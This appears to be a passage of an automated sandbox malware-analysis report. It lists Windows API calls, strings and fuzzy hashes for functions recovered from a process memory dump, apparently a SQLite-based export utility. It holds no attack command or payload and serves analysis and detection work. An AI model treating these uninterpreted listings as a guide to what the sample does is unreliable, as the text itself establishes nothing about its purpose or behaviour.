                                • Opcode ID: 0330b9b22cd30b5b2625a0a7e6ceceae146d238a8b356c7611763844912e7754
                                • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                • Opcode Fuzzy Hash: 0330b9b22cd30b5b2625a0a7e6ceceae146d238a8b356c7611763844912e7754
                                • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                • wcscpy.MSVCRT ref: 0040A0D9
                                • wcscat.MSVCRT ref: 0040A0E6
                                • wcscat.MSVCRT ref: 0040A0F5
                                • wcscpy.MSVCRT ref: 0040A107
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                • String ID:
                                • API String ID: 1331804452-0
                                • Opcode ID: 23c89843948f9d4d6ccb23a927c15bd8e6af065920e5565f2ade9cfd678fbabf
                                • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                • Opcode Fuzzy Hash: 23c89843948f9d4d6ccb23a927c15bd8e6af065920e5565f2ade9cfd678fbabf
                                • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                • String ID: advapi32.dll
                                • API String ID: 2012295524-4050573280
                                • Opcode ID: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                                • Opcode Fuzzy Hash: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                • <?xml version="1.0" ?>, xrefs: 0041007C
                                • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                • <%s>, xrefs: 004100A6
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: memset$_snwprintf
                                • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                • API String ID: 3473751417-2880344631
                                • Opcode ID: 2b06e63593618d13b5a5b8efcda018c795261ff0c1630acf280f9998f6f819b8
                                • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                • Opcode Fuzzy Hash: 2b06e63593618d13b5a5b8efcda018c795261ff0c1630acf280f9998f6f819b8
                                • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: wcscat$_snwprintfmemset
                                • String ID: %2.2X
                                • API String ID: 2521778956-791839006
                                • Opcode ID: 31c2c2b958cbfb7d79e881a69437bc30ebdfa5a8327fe047e8a0291744cff554
                                • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                • Opcode Fuzzy Hash: 31c2c2b958cbfb7d79e881a69437bc30ebdfa5a8327fe047e8a0291744cff554
                                • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: _snwprintfwcscpy
                                • String ID: dialog_%d$general$menu_%d$strings
                                • API String ID: 999028693-502967061
                                • Opcode ID: 80a89c9967db9934379ab2cd2962a5087f7f7915bf37897dca38dc6723802d56
                                • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                • Opcode Fuzzy Hash: 80a89c9967db9934379ab2cd2962a5087f7f7915bf37897dca38dc6723802d56
                                • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: memcpy$memsetstrlen
                                • String ID:
                                • API String ID: 2350177629-0
                                • Opcode ID: 5b01e9cdb19858cbca659f92b0ea30b8779096e26500951ee762ba1ee29ea98e
                                • Instruction ID: 5f65aa9fdfa02acdbc3988aed820739efb0bf546d233f5e01752542f466a415e
                                • Opcode Fuzzy Hash: 5b01e9cdb19858cbca659f92b0ea30b8779096e26500951ee762ba1ee29ea98e
                                • Instruction Fuzzy Hash: 3951017290050DBEEB51DAE8CC45FEFBBBCAB09304F004476F709E6155E6349B498BA6
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: memset
                                • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                • API String ID: 2221118986-1606337402
                                • Opcode ID: f99636ea185a13f681f6ed3553038105d2c4243f795332ddfde7f7b33e8689c4
                                • Instruction ID: 7aef5b05df8cb417835a49add62511a3dd126d480fa81acd131143259a3eb597
                                • Opcode Fuzzy Hash: f99636ea185a13f681f6ed3553038105d2c4243f795332ddfde7f7b33e8689c4
                                • Instruction Fuzzy Hash: 5D818A706083219FDB10CF25E48162BB7E1EF84318F96885EEC949B256D738EC55CB9B
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: memcmpmemset$_mbscpymemcpystrlen
                                • String ID:
                                • API String ID: 265355444-0
                                • Opcode ID: 28e2d425d257f258de9af60d97ecb42603b9b505b60f53e6cc20d6bda128ffa8
                                • Instruction ID: d0ac777748d33e6673793c59e161d6f76d61048b6b1b65ce46f59eb5e56095ce
                                • Opcode Fuzzy Hash: 28e2d425d257f258de9af60d97ecb42603b9b505b60f53e6cc20d6bda128ffa8
                                • Instruction Fuzzy Hash: E241677190060CBEEB21DAA0DC45FDFB7BCAF04344F00443EF655E6182E675AA498BA5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                                  • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                                  • Part of subcall function 00414592: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                  • Part of subcall function 0040A9CE: ??3@YAXPAX@Z.MSVCRT ref: 0040A9DD
                                • memset.MSVCRT ref: 0040C439
                                • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                • _wcsupr.MSVCRT ref: 0040C481
                                  • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                  • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                  • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                  • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                • memset.MSVCRT ref: 0040C4D0
                                • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: ??3@$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                • String ID:
                                • API String ID: 1973883786-0
                                • Opcode ID: f8fc55ba245d1c9f6a3ba6cb2a4711690556c3657263a09b0baeb8372baa9e99
                                • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                • Opcode Fuzzy Hash: f8fc55ba245d1c9f6a3ba6cb2a4711690556c3657263a09b0baeb8372baa9e99
                                • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • memset.MSVCRT ref: 004116FF
                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                  • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                  • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                  • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                  • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                  • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                  • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
                                  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                  • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
                                  • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                • API String ID: 2618321458-3614832568
                                • Opcode ID: 9944a9292e2920dba3aaf51766bf3ae0805637ffbeb5ceac454ead9757247a29
                                • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                • Opcode Fuzzy Hash: 9944a9292e2920dba3aaf51766bf3ae0805637ffbeb5ceac454ead9757247a29
                                • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • memset.MSVCRT ref: 004185FC
                                • GetFileAttributesExW.KERNEL32(00000000,00000000,?), ref: 0041860A
                                • ??3@YAXPAX@Z.MSVCRT ref: 00418650
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: ??3@AttributesFilememset
                                • String ID:
                                • API String ID: 776155459-0
                                • Opcode ID: d685fede4ad05906408a7f39315eb13a14c9e517c365a31a301be47dc6ccaad7
                                • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                • Opcode Fuzzy Hash: d685fede4ad05906408a7f39315eb13a14c9e517c365a31a301be47dc6ccaad7
                                • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • AreFileApisANSI.KERNEL32 ref: 004174FC
                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                • malloc.MSVCRT ref: 00417524
                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                • ??3@YAXPAX@Z.MSVCRT ref: 00417544
                                • ??3@YAXPAX@Z.MSVCRT ref: 00417562
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: ??3@ByteCharMultiWide$ApisFilemalloc
                                • String ID:
                                • API String ID: 2308052813-0
                                • Opcode ID: 726b282c5ce891bd13be6d49280dde48b664c9abca31c80fca4e8053420f6cc1
                                • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                • Opcode Fuzzy Hash: 726b282c5ce891bd13be6d49280dde48b664c9abca31c80fca4e8053420f6cc1
                                • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                • ??3@YAXPAX@Z.MSVCRT ref: 0041822B
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: PathTemp$??3@
                                • String ID: %s\etilqs_$etilqs_
                                • API String ID: 1589464350-1420421710
                                • Opcode ID: e349944c00f8d49a0493748d5881d0d50fc5388be029f354eaf4c315693a2c66
                                • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                • Opcode Fuzzy Hash: e349944c00f8d49a0493748d5881d0d50fc5388be029f354eaf4c315693a2c66
                                • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • memset.MSVCRT ref: 0040FDD5
                                  • Part of subcall function 00414E7F: memcpy.MSVCRT ref: 00414EFC
                                  • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                  • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                • _snwprintf.MSVCRT ref: 0040FE1F
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                • String ID: <%s>%s</%s>$</item>$<item>
                                • API String ID: 1775345501-2769808009
                                • Opcode ID: a80adfea278a619b769589c982a5f837149a8ec15786c25d02deefdd1f26e855
                                • Instruction ID: 102da8641e186e10bf8cf1b41b05db2e7c44eca872c9cddb12e5aab4d34b3b7e
                                • Opcode Fuzzy Hash: a80adfea278a619b769589c982a5f837149a8ec15786c25d02deefdd1f26e855
                                • Instruction Fuzzy Hash: 3111C131600219BBDB21AF65CC86E99BB65FF04348F00007AFD05676A2C779E968CBC9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • wcscpy.MSVCRT ref: 0041477F
                                • wcscpy.MSVCRT ref: 0041479A
                                • CreateFileW.KERNEL32(00000002,40000000,00000000,00000000,00000002,00000000,00000000,?,00000000,?,00411B67,?,General,?,00000000,00000001), ref: 004147C1
                                • CloseHandle.KERNEL32(00000000), ref: 004147C8
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: wcscpy$CloseCreateFileHandle
                                • String ID: General
                                • API String ID: 999786162-26480598
                                • Opcode ID: 54671a12e9c864bd4b64cc02a8f827eeeeb56075ac3ac549414b1b6b262afd21
                                • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                                • Opcode Fuzzy Hash: 54671a12e9c864bd4b64cc02a8f827eeeeb56075ac3ac549414b1b6b262afd21
                                • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetLastError.KERNEL32(00000000,?,00410669,00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00409750
                                • _snwprintf.MSVCRT ref: 0040977D
                                • MessageBoxW.USER32(00000000,?,Error,00000030), ref: 00409796
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: ErrorLastMessage_snwprintf
                                • String ID: Error$Error %d: %s
                                • API String ID: 313946961-1552265934
                                • Opcode ID: c861dc242bfbf6db3d3f925a4a6d39e026dc42dc2a3b2392217f61369f55f285
                                • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                • Opcode Fuzzy Hash: c861dc242bfbf6db3d3f925a4a6d39e026dc42dc2a3b2392217f61369f55f285
                                • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID:
                                • String ID: foreign key constraint failed$new$oid$old
                                • API String ID: 0-1953309616
                                • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                                • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                • unknown column "%s" in foreign key definition, xrefs: 00431858
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: memcpy
                                • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                • API String ID: 3510742995-272990098
                                • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • memset.MSVCRT ref: 004087D6
                                  • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                  • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                • memset.MSVCRT ref: 00408828
                                • memset.MSVCRT ref: 00408840
                                • memset.MSVCRT ref: 00408858
                                • memset.MSVCRT ref: 00408870
                                • memset.MSVCRT ref: 00408888
                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                • String ID:
                                • API String ID: 2911713577-0
                                • Opcode ID: 6684bba834465d20886231ffe2d62564197a18c1a2325da43f028315e65dbcab
                                • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                • Opcode Fuzzy Hash: 6684bba834465d20886231ffe2d62564197a18c1a2325da43f028315e65dbcab
                                • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: memcpymemset
                                • String ID: gj
                                • API String ID: 1297977491-4203073231
                                • Opcode ID: 89e2b4c479d66d8f351294c0966a75ef3485227debcc485d945bfba73828c7b8
                                • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                • Opcode Fuzzy Hash: 89e2b4c479d66d8f351294c0966a75ef3485227debcc485d945bfba73828c7b8
                                • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8EC
                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8FA
                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E90B
                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E922
                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E92B
                                • ??3@YAXPAX@Z.MSVCRT ref: 0040E961
                                • ??3@YAXPAX@Z.MSVCRT ref: 0040E974
                                • ??3@YAXPAX@Z.MSVCRT ref: 0040E987
                                • ??3@YAXPAX@Z.MSVCRT ref: 0040E99A
                                • ??3@YAXPAX@Z.MSVCRT ref: 0040E9D3
                                  • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
